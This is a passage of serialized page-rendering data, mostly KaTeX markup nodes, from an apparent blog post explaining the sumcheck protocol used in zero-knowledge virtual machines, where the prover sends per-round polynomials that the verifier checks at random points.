{"type":25,"tag":216,"props":112720,"children":112722},{"className":112721,"style":6083},[309],[112723],{"type":25,"tag":216,"props":112724,"children":112725},{"style":6104},[112726,112730],{"type":25,"tag":216,"props":112727,"children":112729},{"className":112728,"style":2181},[319],[],{"type":25,"tag":216,"props":112731,"children":112733},{"className":112732},[2186,2187,2188,2189],[112734],{"type":25,"tag":216,"props":112735,"children":112737},{"className":112736},[246,2151,2189],[112738],{"type":31,"value":2196},{"type":31,"value":112740},"), i.e the claim:",{"type":25,"tag":38,"props":112742,"children":112743},{},[112744],{"type":25,"tag":82,"props":112745,"children":112747},{"className":112746},[212,4702],[112748],{"type":25,"tag":216,"props":112749,"children":112751},{"className":112750},[224],[112752],{"type":25,"tag":216,"props":112753,"children":112755},{"className":112754,"ariaHidden":230},[229],[112756,112782],{"type":25,"tag":216,"props":112757,"children":112759},{"className":112758},[235],[112760,112764,112769,112773,112778],{"type":25,"tag":216,"props":112761,"children":112763},{"className":112762,"style":4799},[240],[],{"type":25,"tag":216,"props":112765,"children":112767},{"className":112766,"style":2679},[246,2151],[112768],{"type":31,"value":2682},{"type":25,"tag":216,"props":112770,"children":112772},{"className":112771,"style":258},[257],[],{"type":25,"tag":216,"props":112774,"children":112776},{"className":112775},[263],[112777],{"type":31,"value":266},{"type":25,"tag":216,"props":112779,"children":112781},{"className":112780,"style":258},[257],[],{"type":25,"tag":216,"props":112783,"children":112785},{"className":112784},[235],[112786,112790,112935,112939,113082,113086,113093,113097,113241,113245,113251,113256,113313,113318,113322,113379,113384,113388,113394,113398,113403,113407,113464],{"type":25,"tag":216,"props":112787,"children":112789},{"className":112788,"style":25574},[240],[],{"type":25,"tag":216,"props":112791,"children":112793},{"className":112792},[1841],[112794,112799],{"type":25,"tag":216,"props":112795,"children":112797},{"className":112796,"style":25584},[1841,4048,25583],[112798],{"type":31,"value":4052},{"type":25,"tag":216,"props":112800,"children":112802},{"className":112801},[2159],[112803],{"type":25,"tag":216,"props":112804,"children":112806},{"className":112805},[298,299],[112807,112924],{"type":25,"tag":216,"props":112808,"children":112810},{"className":112809},[304],[112811,112919],{"type":25,"tag":216,"props":112812,"children":112814},{"className":112813,"style":25603},[309],[112815],{"type":25,"tag":216,"props":112816,"children":112817},{"style":25607},[112818,112822],{"type":25,"tag":216,"props":112819,"children":112821},{"className":112820,"style":2181},[319],[],{"type":25,"tag":216,"props":112823,"children":112825},{"className":112824},[2186,2187,2188,2189],[112826],{"type":25,"tag":216,"props":112827,"children":112829},{"className":112828},[246,2189],[112830,112889,112894,112899,112904,112909,112914],{"type":25,"tag":216,"props":112831,"children":112833},{"className":112832},[246,2189],[112834,112839],{"type":25,"tag":216,"props":112835,"children":112837},{"className":112836},[246,2151,2189],[112838],{"type":31,"value":2541},{"type":25,"tag":216,"props":112840,"children":112842},{"className":112841},[2159],[112843],{"type":25,"tag":216,"props":112844,"children":112846},{"className":112845},[298,299],[112847,112878],{"type":25,"tag":216,"props":112848,"children":112850},{"className":112849},[304],[112851,112873],{"type":25,"tag":216,"props":112852,"children":112855},{"className":112853,"style":112854},[309],"height:0.3173em;",[112856],{"type":25,"tag":216,"props":112857,"children":112859},{"style":112858},"top:-2.357em;margin-left:0em;margin-right:0.0714em;",[112860,112864],{"type":25,"tag":216,"props":112861,"children":112863},{"className":112862,"style":5106},[319],[],{"type":25,"tag":216,"props":112865,"children":112867},{"className":112866},[2186,5111,5112,2189],[112868],{"type":25,"tag":216,"props":112869,"children":112871},{"className":112870},[246,2189],[112872],{"type":31,"value":184},{"type":25,"tag":216,"props":112874,"children":112876},{"className":112875},[408],[112877],{"type":31,"value":411},{"type":25,"tag":216,"props":112879,"children":112881},{"className":112880},[304],[112882],{"type":25,"tag":216,"props":112883,"children":112885},{"className":112884,"style":5218},[309],[112886],{"type":25,"tag":216,"props":112887,"children":112888},{},[],{"type":25,"tag":216,"props":112890,"children":112892},{"className":112891},[263,2189],[112893],{"type":31,"value":25647},{"type":25,"tag":216,"props":112895,"children":112897},{"className":112896},[287,2189],[112898],{"type":31,"value":80590},{"type":25,"tag":216,"props":112900,"children":112902},{"className":112901},[246,2189],[112903],{"type":31,"value":1882},{"type":25,"tag":216,"props":112905,"children":112907},{"className":112906},[1864,2189],[112908],{"type":31,"value":1867},{"type":25,"tag":216,"props":112910,"children":112912},{"className":112911},[246,2189],[112913],{"type":31,"value":184},{"type":25,"tag":216,"props":112915,"children":112917},{"className":112916},[427,2189],[112918],{"type":31,"value":38103},{"type":25,"tag":216,"props":112920,"children":112922},{"className":112921},[408],[112923],{"type":31,"value":411},{"type":25,"tag":216,"props":112925,"children":112927},{"className":112926},[304],[112928],{"type":25,"tag":216,"props":112929,"children":112931},{"className":112930,"style":25703},[309],[112932],{"type":25,"tag":216,"props":112933,"children":112934},{},[],{"type":25,"tag":216,"props":112936,"children":112938},{"className":112937,"style":1871},[257],[],{"type":25,"tag":216,"props":112940,"children":112942},{"className":112941},[1841],[112943,112948],{"type":25,"tag":216,"props":112944,"children":112946},{"className":112945,"style":25584},[1841,4048,25583],[112947],{"type":31,"value":4052},{"type":25,"tag":216,"props":112949,"children":112951},{"className":112950},[2159],[112952],{"type":25,"tag":216,"props":112953,"children":112955},{"className":112954},[298,299],[112956,113071],{"type":25,"tag":216,"props":112957,"children":112959},{"className":112958},[304],[112960,113066],{"type":25,"tag":216,"props":112961,"children":112963},{"className":112962,"style":25603},[309],[112964],{"type":25,"tag":216,"props":112965,"children":112966},{"style":25607},[112967,112971],{"type":25,"tag":216,"props":112968,"children":112970},{"className":112969,"style":2181},[319],[],{"type":25,"tag":216,"props":112972,"children":112974},{"className":112973},[2186,2187,2188,2189],[112975],{"type":25,"tag":216,"props":112976,"children":112978},{"className":112977},[246,2189],[112979,113036,113041,113046,113051,113056,113061],{"type":25,"tag":216,"props":112980,"children":112982},{"className":112981},[246,2189],[112983,112988],{"type":25,"tag":216,"props":112984,"children":112986},{"className":112985},[246,2151,2189],[112987],{"type":31,"value":2541},{"type":25,"tag":216,"props":112989,"children":112991},{"className":112990},[2159],[112992],{"type":25,"tag":216,"props":112993,"children":112995},{"className":112994},[298,299],[112996,113025],{"type":25,"tag":216,"props":112997,"children":112999},{"className":112998},[304],[113000,113020],{"type":25,"tag":216,"props":113001,"children":113003},{"className":113002,"style":112854},[309],[113004],{"type":25,"tag":216,"props":113005,"children":113006},{"style":112858},[113007,113011],{"type":25,"tag":216,"props":113008,"children":113010},{"className":113009,"style":5106},[319],[],{"type":25,"tag":216,"props":113012,"children":113014},{"className":113013},[2186,5111,5112,2189],[113015],{"type":25,"tag":216,"props":113016,"children":113018},{"className":113017},[246,2189],[113019],{"type":31,"value":331},{"type":25,"tag":216,"props":113021,"children":113023},{"className":113022},[408],[113024],{"type":31,"value":411},{"type":25,"tag":216,"props":113026,"children":113028},{"className":113027},[304],[113029],{"type":25,"tag":216,"props":113030,"children":113032},{"className":113031,"style":5218},[309],[113033],{"type":25,"tag":216,"props":113034,"children":113035},{},[],{"type":25,"tag":216,"props":113037,"children":113039},{"className":113038},[263,2189],[113040],{"type":31,"value":25647},{"type":25,"tag":216,"props":113042,"children":113044},{"className":113043},[287,2189],[113045],{"type":31,"value":80590},{"type":25,"tag":216,"props":113047,"children":113049},{"className":113048},[246,2189],[113050],{"type":31,"value":1882},{"type":25,"tag":216,"props":113052,"children":113054},{"className":113053},[1864,2189],[113055],{"type":31,"value":1867},{"type":25,"tag":216,"props":113057,"children":113059},{"className":113058},[246,2189],[113060],{"type":31,"value":184},{"type":25,"tag":216,"props":113062,"children":113064},{"className":113063},[427,2189],[113065],{"type":31,"value":38103},{"type":25,"tag":216,"props":113067,"children":113069},{"className":113068},[408],[113070],{"type":31,"value":411},{"type":25,"tag":216,"props":113072,"children":113074},{"className":113073},[304],[113075],{"type":25,"tag":216,"props":113076,"children":113078},{"className":113077,"style":25703},[309],[113079],{"type":25,"tag":216,"props":113080,"children":113081},{},[],{"type":25,"tag":216,"props":113083,"children":113085},{"className":113084,"style":1871},[257],[],{"type":25,"tag":216,"props":113087,"children":113090},{"className":113088},[113089],"minner",[113091],{"type":31,"value":113092},"⋯",{"type":25,"tag":216,"props":113094,"children":113096},{"className":113095,"style":1871},[257],[],{"type":25,"tag":216,"props":113098,"children":113100},{"className":113099},[1841],[113101,113106],{"type":25,"tag":216,"props":113102,"children":113104},{"className":113103,"style":25584},[1841,4048,25583],[113105],{"type":31,"value":4052},{"type":25,"tag":216,"props":113107,"children":113109},{"className":113108},[2159],[113110],{"type":25,"tag":216,"props":113111,"children":113113},{"className":113112},[298,299],[113114,113230],{"type":25,"tag":216,"props":113115,"children":113117},{"className":113116},[304],[113118,113225],{"type":25,"tag":216,"props":113119,"children":113121},{"className":113120,"style":25603},[309],[113122],{"type":25,"tag":216,"props":113123,"children":113124},{"style":25607},[113125,113129],{"type":25,"tag":216,"props":113126,"children":113128},{"className":113127,"style":2181},[319],[],{"type":25,"tag":216,"props":113130,"children":113132},{"className":113131},[2186,2187,2188,2189],[113133],{"type":25,"tag":216,"props":113134,"children":113136},{"className":113135},[246,2189],[113137,113195,113200,113205,113210,113215,113220],{"type":25,"tag":216,"props":113138,"children":113140},{"className":113139},[246,2189],[113141,113146],{"type":25,"tag":216,"props":113142,"children":113144},{"className":113143},[246,2151,2189],[113145],{"type":31,"value":2541},{"type":25,"tag":216,"props":113147,"children":113149},{"className":113148},[2159],[113150],{"type":25,"tag":216,"props":113151,"children":113153},{"className":113152},[298,299],[113154,113184],{"type":25,"tag":216,"props":113155,"children":113157},{"className":113156},[304],[113158,113179],{"type":25,"tag":216,"props":113159,"children":113162},{"className":113160,"style":113161},[309],"height:0.1645em;",[113163],{"type":25,"tag":216,"props":113164,"children":113165},{"style":112858},[113166,113170],{"type":25,"tag":216,"props":113167,"children":113169},{"className":113168,"style":5106},[319],[],{"type":25,"tag":216,"props":113171,"children":113173},{"className":113172},[2186,5111,5112,2189],[113174],{"type":25,"tag":216,"props":113175,"children":113177},{"className":113176},[246,2151,2189],[113178],{"type":31,"value":2196},{"type":25,"tag":216,"props":113180,"children":113182},{"className":113181},[408],[113183],{"type":31,"value":411},{"type":25,"tag":216,"props":113185,"children":113187},{"className":113186},[304],[113188],{"type":25,"tag":216,"props":113189,"children":113191},{"className":113190,"style":5218},[309],[113192],{"type":25,"tag":216,"props":113193,"children":113194},{},[],{"type":25,"tag":216,"props":113196,"children":113198},{"className":113197},[263,2189],[113199],{"type":31,"value":25647},{"type":25,"tag":216,"props":113201,"children":113203},{"className":113202},[287,2189],[113204],{"type":31,"value":80590},{"type":25,"tag":216,"props":113206,"children":113208},{"className":113207},[246,2189],[113209],{"type":31,"value":1882},{"type":25,"tag":216,"props":113211,"children":113213},{"className":113212},[1864,2189],[113214],{"type":31,"value":1867},{"type":25,"tag":216,"props":113216,"children":113218},{"className":113217},[246,2189],[113219],{"type":31,"value":184},{"type":25,"tag":216,"props":113221,"children":113223},{"className":113222},[427,2189],[113224],{"type":31,"value":38103},{"type":25,"tag":216,"props":113226,"children":113228},{"className":113227},[408],[113229],{"type":31,"value":411},{"type":25,"tag":216,"props":113231,"children":113233},{"className":113232},[304],[113234],{"type":25,"tag":216,"props":113235,"children":113237},{"className":113236,"style":25703},[309],[113238],{"type":25,"tag":216,"props":113239,"children":113240},{},[],{"type":25,"tag":216,"props":113242,"children":113244},{"className":113243,"style":1871},[257],[],{"type":25,"tag":216,"props":113246,"children":113248},{"className":113247,"style":2325},[246,2151],[113249],{"type":31,"value":113250},"g",{"type":25,"tag":216,"props":113252,"children":113254},{"className":113253},[287],[113255],{"type":31,"value":1850},{"type":25,"tag":216,"props":113257,"children":113259},{"className":113258},[246],[113260,113265],{"type":25,"tag":216,"props":113261,"children":113263},{"className":113262},[246,2151],[113264],{"type":31,"value":2541},{"type":25,"tag":216,"props":113266,"children":113268},{"className":113267},[2159],[113269],{"type":25,"tag":216,"props":113270,"children":113272},{"className":113271},[298,299],[113273,113302],{"type":25,"tag":216,"props":113274,"children":113276},{"className":113275},[304],[113277,113297],{"type":25,"tag":216,"props":113278,"children":113280},{"className":113279,"style":97069},[309],[113281],{"type":25,"tag":216,"props":113282,"children":113283},{"style":2274},[113284,113288],{"type":25,"tag":216,"props":113285,"children":113287},{"className":113286,"style":2181},[319],[],{"type":25,"tag":216,"props":113289,"children":113291},{"className":113290},[2186,2187,2188,2189],[113292],{"type":25,"tag":216,"props":113293,"children":113295},{"className":113294},[246,2189],[113296],{"type":31,"value":184},{"type":25,"tag":216,"props":113298,"children":113300},{"className":113299},[408],[113301],{"type":31,"value":411},{"type":25,"tag":216,"props":113303,"children":113305},{"className":113304},[304],[113306],{"type":25,"tag":216,"props":113307,"children":113309},{"className":113308,"style":2209},[309],[113310],{"type":25,"tag":216,"props":113311,"children":113312},{},[],{"type":25,"tag":216,"props":113314,"children":113316},{"className":113315},[1864],[113317],{"type":31,"value":1867},{"type":25,"tag":216,"props":113319,"children":113321},{"className":113320,"style":1871},[257],[],{"type":25,"tag":216,"props":113323,"children":113325},{"className":113324},[246],[113326,113331],{"type":25,"tag":216,"props":113327,"children":113329},{"className":113328},[246,2151],[113330],{"type":31,"value":2541},{"type":25,"tag":216,"props":113332,"children":113334},{"className":113333},[2159],[113335],{"type":25,"tag":216,"props":113336,"children":113338},{"className":113337},[298,299],[113339,113368],{"type":25,"tag":216,"props":113340,"children":113342},{"className":113341},[304],[113343,113363],{"type":25,"tag":216,"props":113344,"children":113346},{"className":113345,"style":97069},[309],[113347],{"type":25,"tag":216,"props":113348,"children":113349},{"style":2274},[113350,113354],{"type":25,"tag":216,"props":113351,"children":113353},{"className":113352,"style":2181},[319],[],{"type":25,"tag":216,"props":113355,"children":113357},{"className":113356},[2186,2187,2188,2189],[113358],{"type":25,"tag":216,"props":113359,"children":113361},{"className":113360},[246,2189],[113362],{"type":31,"value":331},{"type":25,"tag":216,"props":113364,"children":113366},{"className":113365},[408],[113367],{"type":31,"value":411},{"type":25,"tag":216,"props":113369,"children":113371},{"className":113370},[304],[113372],{"type":25,"tag":216,"props":113373,"children":113375},{"className":113374,"style":2209},[309],[113376],{"type":25,"tag":216,"props":113377,"children":113378},{},[],{"type":25,"tag":216,"props":113380,"children":113382},{"className":113381},[1864],[113383],{"type":31,"value":1867},{"type":25,"tag":216,"props":113385,"children":113387},{"className":113386,"style":1871},[257],[],{"type":25,"tag":216,"props":113389,"children":113391},{"className":113390},[113089],[113392],{"type":31,"value":113393},"…",{"type":25,"tag":216,"props":113395,"children":113397},{"className":113396,"style":1871},[257],[],{"type":25,"tag":216,"props":113399,"children":113401},{"className":113400},[1864],[113402],{"type":31,"value":1867},{"type":25,"tag":216,"props":113404,"children":113406},{"className":113405,"style":1871},[257],[],{"type":25,"tag":216,"props":113408,"children":113410},{"className":113409},[246],[113411,113416],{"type":25,"tag":216,"props":113412,"children":113414},{"className":113413},[246,2151],[113415],{"type":31,"value":2541},{"type":25,"tag":216,"props":113417,"children":113419},{"className":113418},[2159],[113420],{"type":25,"tag":216,"props":113421,"children":113423},{"className":113422},[298,299],[113424,113453],{"type":25,"tag":216,"props":113425,"children":113427},{"className":113426},[304],[113428,113448],{"type":25,"tag":216,"props":113429,"children":113431},{"className":113430,"style":2172},[309],[113432],{"type":25,"tag":216,"props":113433,"children":113434},{"style":2274},[113435,113439],{"type":25,"tag":216,"props":113436,"children":113438},{"className":113437,"style":2181},[319],[],{"type":25,"tag":216,"props":113440,"children":113442},{"className":113441},[2186,2187,2188,2189],[113443],{"type":25,"tag":216,"props":113444,"children":113446},{"className":113445},[246,2151,2189],[113447],{"type":31,"value":2196},{"type":25,"tag":216,"props":113449,"children":113451},{"className":113450},[408],[113452],{"type":31,"value":411},{"type":25,"tag":216,"props":113454,"children":113456},{"className":113455},[304],[113457],{"type":25,"tag":216,"props":113458,"children":113460},{"className":113459,"style":2209},[309],[113461],{"type":25,"tag":216,"props":113462,"children":113463},{},[],{"type":25,"tag":216,"props":113465,"children":113467},{"className":113466},[427],[113468],{"type":31,"value":1888},{"type":25,"tag":38,"props":113470,"children":113471},{},[113472,113474,113535],{"type":31,"value":113473},"The naive approach would be for the verifier to compute all ",{"type":25,"tag":82,"props":113475,"children":113477},{"className":113476},[212,4702],[113478],{"type":25,"tag":216,"props":113479,"children":113481},{"className":113480},[224],[113482],{"type":25,"tag":216,"props":113483,"children":113485},{"className":113484,"ariaHidden":230},[229],[113486],{"type":25,"tag":216,"props":113487,"children":113489},{"className":113488},[235],[113490,113494],{"type":25,"tag":216,"props":113491,"children":113493},{"className":113492,"style":6083},[240],[],{"type":25,"tag":216,"props":113495,"children":113497},{"className":113496},[246],[113498,113503],{"type":25,"tag":216,"props":113499,"children":113501},{"className":113500},[246],[113502],{"type":31,"value":331},{"type":25,"tag":216,"props":113504,"children":113506},{"className":113505},[2159],[113507],{"type":25,"tag":216,"props":113508,"children":113510},{"className":113509},[298],[113511],{"type":25,"tag":216,"props":113512,"children":113514},{"className":113513},[304],[113515],{"type":25,"tag":216,"props":113516,"children":113518},{"className":113517,"style":6083},[309],[113519],{"type":25,"tag":216,"props":113520,"children":113521},{"style":6104},[113522,113526],{"type":25,"tag":216,"props":113523,"children":113525},{"className":113524,"style":2181},[319],[],{"type":25,"tag":216,"props":113527,"children":113529},{"className":113528},[2186,2187,2188,2189],[113530],{"type":25,"tag":216,"props":113531,"children":113533},{"className":113532},[246,2151,2189],[113534],{"type":31,"value":2196},{"type":31,"value":113536}," evaluations. This is exponentially expensive.",{"type":25,"tag":38,"props":113538,"children":113539},{},[113540,113542,113547],{"type":31,"value":113541},"The sumcheck protocol is a clever interactive protocol that reduces the exponential number of polynomial evaluations to checking ",{"type":25,"tag":9273,"props":113543,"children":113544},{},[113545],{"type":31,"value":113546},"only one",{"type":31,"value":179},{"type":25,"tag":38,"props":113549,"children":113550},{},[113551],{"type":25,"tag":6467,"props":113552,"children":113555},{"alt":113553,"src":113554},"sumcheck_v2","/posts/zkvms-unfaithful-claims/sumcheck_v2.svg",[],{"type":25,"tag":38,"props":113557,"children":113558},{},[113559,113561,113653,113655,113840,113842,113867,113869,113947,113949,114026],{"type":31,"value":113560},"In each round, the prover must send a polynomial ",{"type":25,"tag":82,"props":113562,"children":113564},{"className":113563},[212,4702],[113565],{"type":25,"tag":216,"props":113566,"children":113568},{"className":113567},[224],[113569],{"type":25,"tag":216,"props":113570,"children":113572},{"className":113571,"ariaHidden":230},[229],[113573],{"type":25,"tag":216,"props":113574,"children":113576},{"className":113575},[235],[113577,113581,113638,113643,113648],{"type":25,"tag":216,"props":113578,"children":113580},{"className":113579,"style":5513},[240],[],{"type":25,"tag":216,"props":113582,"children":113584},{"className":113583},[246],[113585,113590],{"type":25,"tag":216,"props":113586,"children":113588},{"className":113587,"style":2325},[246,2151],[113589],{"type":31,"value":113250},{"type":25,"tag":216,"props":113591,"children":113593},{"className":113592},[2159],[113594],{"type":25,"tag":216,"props":113595,"children":113597},{"className":113596},[298,299],[113598,113627],{"type":25,"tag":216,"props":113599,"children":113601},{"className":113600},[304],[113602,113622],{"type":25,"tag":216,"props":113603,"children":113605},{"className":113604,"style":2270},[309],[113606],{"type":25,"tag":216,"props":113607,"children":113608},{"style":2347},[113609,113613],{"type":25,"tag":216,"props":113610,"children":113612},{"className":113611,"style":2181},[319],[],{"type":25,"tag":216,"props":113614,"children":113616},{"className":113615},[2186,2187,2188,2189],[113617],{"type":25,"tag":216,"props":113618,"children":113620},{"className":113619},[246,2151,2189],[113621],{"type":31,"value":2289},{"type":25,"tag":216,"props":113623,"children":113625},{"className":113624},[408],[113626],{"type":31,"value":411},{"type":25,"tag":216,"props":113628,"children":113630},{"className":113629},[304],[113631],{"type":25,"tag":216,"props":113632,"children":113634},{"className":113633,"style":2209},[309],[113635],{"type":25,"tag":216,"props":113636,"children":113637},{},[],{"type":25,"tag":216,"props":113639,"children":113641},{"className":113640},[287],[113642],{"type":31,"value":1850},{"type":25,"tag":216,"props":113644,"children":113646},{"className":113645,"style":2229},[246,2151],[113647],{"type":31,"value":10084},{"type":25,"tag":216,"props":113649,"children":113651},{"className":113650},[427],[113652],{"type":31,"value":1888},{"type":31,"value":113654}," such that ",{"type":25,"tag":82,"props":113656,"children":113658},{"className":113657},[212,4702],[113659],{"type":25,"tag":216,"props":113660,"children":113662},{"className":113661},[224],[113663],{"type":25,"tag":216,"props":113664,"children":113666},{"className":113665,"ariaHidden":230},[229],[113667,113760],{"type":25,"tag":216,"props":113668,"children":113670},{"className":113669},[235],[113671,113675,113732,113737,113742,113747,113751,113756],{"type":25,"tag":216,"props":113672,"children":113674},{"className":113673,"style":5513},[240],[],{"type":25,"tag":216,"props":113676,"children":113678},{"className":113677},[246],[113679,113684],{"type":25,"tag":216,"props":113680,"children":113682},{"className":113681,"style":2325},[246,2151],[113683],{"type":31,"value":113250},{"type":25,"tag":216,"props":113685,"children":113687},{"className":113686},[2159],[113688],{"type":25,"tag":216,"props":113689,"children":113691},{"className":113690},[298,299],[113692,113721],{"type":25,"tag":216,"props":113693,"children":113695},{"className":113694},[304],[113696,113716],{"type":25,"tag":216,"props":113697,"children":113699},{"className":113698,"style":2270},[309],[113700],{"type":25,"tag":216,"props":113701,"children":113702},{"style":2347},[113703,113707],{"type":25,"tag":216,"props":113704,"children":113706},{"className":113705,"style":2181},[319],[],{"type":25,"tag":216,"props":113708,"children":113710},{"className":113709},[2186,2187,2188,2189],[113711],{"type":25,"tag":216,"props":113712,"children":113714},{"className":113713},[246,2151,2189],[113715],{"type":31,"value":2289},{"type":25,"tag":216,"props":113717,"children":113719},{"className":113718},[408],[113720],{"type":31,"value":411},{"type":25,"tag":216,"props":113722,"children":113724},{"className":113723},[304],[113725],{"type":25,"tag":216,"props":113726,"children":113728},{"className":113727,"style":2209},[309],[113729],{"type":25,"tag":216,"props":113730,"children":113731},{},[],{"type":25,"tag":216,"props":113733,"children":113735},{"className":113734},[287],[113736],{"type":31,"value":1850},{"type":25,"tag":216,"props":113738,"children":113740},{"className":113739},[246],[113741],{"type":31,"value":1882},{"type":25,"tag":216,"props":113743,"children":113745},{"className":113744},[427],[113746],{"type":31,"value":1888},{"type":25,"tag":216,"props":113748,"children":113750},{"className":113749,"style":335},[257],[],{"type":25,"tag":216,"props":113752,"children":113754},{"className":113753},[340],[113755],{"type":31,"value":3539},{"type":25,"tag":216,"props":113757,"children":113759},{"className":113758,"style":335},[257],[],{"type":25,"tag":216,"props":113761,"children":113763},{"className":113762},[235],[113764,113768,113825,113830,113835],{"type":25,"tag":216,"props":113765,"children":113767},{"className":113766,"style":5513},[240],[],{"type":25,"tag":216,"props":113769,"children":113771},{"className":113770},[246],[113772,113777],{"type":25,"tag":216,"props":113773,"children":113775},{"className":113774,"style":2325},[246,2151],[113776],{"type":31,"value":113250},{"type":25,"tag":216,"props":113778,"children":113780},{"className":113779},[2159],[113781],{"type":25,"tag":216,"props":113782,"children":113784},{"className":113783},[298,299],[113785,113814],{"type":25,"tag":216,"props":113786,"children":113788},{"className":113787},[304],[113789,113809],{"type":25,"tag":216,"props":113790,"children":113792},{"className":113791,"style":2270},[309],[113793],{"type":25,"tag":216,"props":113794,"children":113795},{"style":2347},[113796,113800],{"type":25,"tag":216,"props":113797,"children":113799},{"className":113798,"style":2181},[319],[],{"type":25,"tag":216,"props":113801,"children":113803},{"className":113802},[2186,2187,2188,2189],[113804],{"type":25,"tag":216,"props":113805,"children":113807},{"className":113806},[246,2151,2189],[113808],{"type":31,"value":2289},{"type":25,"tag":216,"props":113810,"children":113812},{"className":113811},[408],[113813],{"type":31,"value":411},{"type":25,"tag":216,"props":113815,"children":113817},{"className":113816},[304],[113818],{"type":25,"tag":216,"props":113819,"children":113821},{"className":113820,"style":2209},[309],[113822],{"type":25,"tag":216,"props":113823,"children":113824},{},[],{"type":25,"tag":216,"props":113826,"children":113828},{"className":113827},[287],[113829],{"type":31,"value":1850},{"type":25,"tag":216,"props":113831,"children":113833},{"className":113832},[246],[113834],{"type":31,"value":184},{"type":25,"tag":216,"props":113836,"children":113838},{"className":113837},[427],[113839],{"type":31,"value":1888},{"type":31,"value":113841}," equals the previous claim. If the prover is lying about the original sum ",{"type":25,"tag":82,"props":113843,"children":113845},{"className":113844},[212,4702],[113846],{"type":25,"tag":216,"props":113847,"children":113849},{"className":113848},[224],[113850],{"type":25,"tag":216,"props":113851,"children":113853},{"className":113852,"ariaHidden":230},[229],[113854],{"type":25,"tag":216,"props":113855,"children":113857},{"className":113856},[235],[113858,113862],{"type":25,"tag":216,"props":113859,"children":113861},{"className":113860,"style":4799},[240],[],{"type":25,"tag":216,"props":113863,"children":113865},{"className":113864,"style":2679},[246,2151],[113866],{"type":31,"value":2682},{"type":31,"value":113868},", then they must lie about ",{"type":25,"tag":82,"props":113870,"children":113872},{"className":113871},[212,4702],[113873],{"type":25,"tag":216,"props":113874,"children":113876},{"className":113875},[224],[113877],{"type":25,"tag":216,"props":113878,"children":113880},{"className":113879,"ariaHidden":230},[229],[113881],{"type":25,"tag":216,"props":113882,"children":113884},{"className":113883},[235],[113885,113890],{"type":25,"tag":216,"props":113886,"children":113889},{"className":113887,"style":113888},[240],"height:0.625em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":113891,"children":113893},{"className":113892},[246],[113894,113899],{"type":25,"tag":216,"props":113895,"children":113897},{"className":113896,"style":2325},[246,2151],[113898],{"type":31,"value":113250},{"type":25,"tag":216,"props":113900,"children":113902},{"className":113901},[2159],[113903],{"type":25,"tag":216,"props":113904,"children":113906},{"className":113905},[298,299],[113907,113936],{"type":25,"tag":216,"props":113908,"children":113910},{"className":113909},[304],[113911,113931],{"type":25,"tag":216,"props":113912,"children":113914},{"className":113913,"style":2270},[309],[113915],{"type":25,"tag":216,"props":113916,"children":113917},{"style":2347},[113918,113922],{"type":25,"tag":216,"props":113919,"children":113921},{"className":113920,"style":2181},[319],[],{"type":25,"tag":216,"props":113923,"children":113925},{"className":113924},[2186,2187,2188,2189],[113926],{"type":25,"tag":216,"props":113927,"children":113929},{"className":113928},[246,2151,2189],[113930],{"type":31,"value":2289},{"type":25,"tag":216,"props":113932,"children":113934},{"className":113933},[408],[113935],{"type":31,"value":411},{"type":25,"tag":216,"props":113937,"children":113939},{"className":113938},[304],[113940],{"type":25,"tag":216,"props":113941,"children":113943},{"className":113942,"style":2209},[309],[113944],{"type":25,"tag":216,"props":113945,"children":113946},{},[],{"type":31,"value":113948}," somewhere. But since the verifier picks a random ",{"type":25,"tag":82,"props":113950,"children":113952},{"className":113951},[212,4702],[113953],{"type":25,"tag":216,"props":113954,"children":113956},{"className":113955},[224],[113957],{"type":25,"tag":216,"props":113958,"children":113960},{"className":113959,"ariaHidden":230},[229],[113961],{"type":25,"tag":216,"props":113962,"children":113964},{"className":113963},[235],[113965,113969],{"type":25,"tag":216,"props":113966,"children":113968},{"className":113967,"style":4827},[240],[],{"type":25,"tag":216,"props":113970,"children":113972},{"className":113971},[246],[113973,113978],{"type":25,"tag":216,"props":113974,"children":113976},{"className":113975,"style":2752},[246,2151],[113977],{"type":31,"value":97829},{"type":25,"tag":216,"props":113979,"children":113981},{"className":113980},[2159],[113982],{"type":25,"tag":216,"props":113983,"children":113985},{"className":113984},[298,299],[113986,114015],{"type":25,"tag":216,"props":113987,"children":113989},{"className":113988},[304],[113990,114010],{"type":25,"tag":216,"props":113991,"children":113993},{"className":113992,"style":2270},[309],[113994],{"type":25,"tag":216,"props":113995,"children":113996},{"style":2774},[113997,114001],{"type":25,"tag":216,"props":113998,"children":114000},{"className":113999,"style":2181},[319],[],{"type":25,"tag":216,"props":114002,"children":114004},{"className":114003},[2186,2187,2188,2189],[114005],{"type":25,"tag":216,"props":114006,"children":114008},{"className":114007},[246,2151,2189],[114009],{"type":31,"value":2289},{"type":25,"tag":216,"props":114011,"children":114013},{"className":114012},[408],[114014],{"type":31,"value":411},{"type":25,"tag":216,"props":114016,"children":114018},{"className":114017},[304],[114019],{"type":25,"tag":216,"props":114020,"children":114022},{"className":114021,"style":2209},[309],[114023],{"type":25,"tag":216,"props":114024,"children":114025},{},[],{"type":31,"value":114027},", with overwhelming probability, the prover won't then be able to match the evaluation of the original polynomial.",{"type":25,"tag":630,"props":114029,"children":114031},{"id":114030},"the-compression-trick",[114032],{"type":31,"value":114033},"The Compression Trick",{"type":25,"tag":38,"props":114035,"children":114036},{},[114037,114039,114189,114191,114470],{"type":31,"value":114038},"For degree-1 (multilinear) polynomials, ",{"type":25,"tag":82,"props":114040,"children":114042},{"className":114041},[212,4702],[114043],{"type":25,"tag":216,"props":114044,"children":114046},{"className":114045},[224],[114047],{"type":25,"tag":216,"props":114048,"children":114050},{"className":114049,"ariaHidden":230},[229],[114051,114144,114171],{"type":25,"tag":216,"props":114052,"children":114054},{"className":114053},[235],[114055,114059,114116,114121,114126,114131,114135,114140],{"type":25,"tag":216,"props":114056,"children":114058},{"className":114057,"style":5513},[240],[],{"type":25,"tag":216,"props":114060,"children":114062},{"className":114061},[246],[114063,114068],{"type":25,"tag":216,"props":114064,"children":114066},{"className":114065,"style":2325},[246,2151],[114067],{"type":31,"value":113250},{"type":25,"tag":216,"props":114069,"children":114071},{"className":114070},[2159],[114072],{"type":25,"tag":216,"props":114073,"children":114075},{"className":114074},[298,299],[114076,114105],{"type":25,"tag":216,"props":114077,"children":114079},{"className":114078},[304],[114080,114100],{"type":25,"tag":216,"props":114081,"children":114083},{"className":114082,"style":2270},[309],[114084],{"type":25,"tag":216,"props":114085,"children":114086},{"style":2347},[114087,114091],{"type":25,"tag":216,"props":114088,"children":114090},{"className":114089,"style":2181},[319],[],{"type":25,"tag":216,"props":114092,"children":114094},{"className":114093},[2186,2187,2188,2189],[114095],{"type":25,"tag":216,"props":1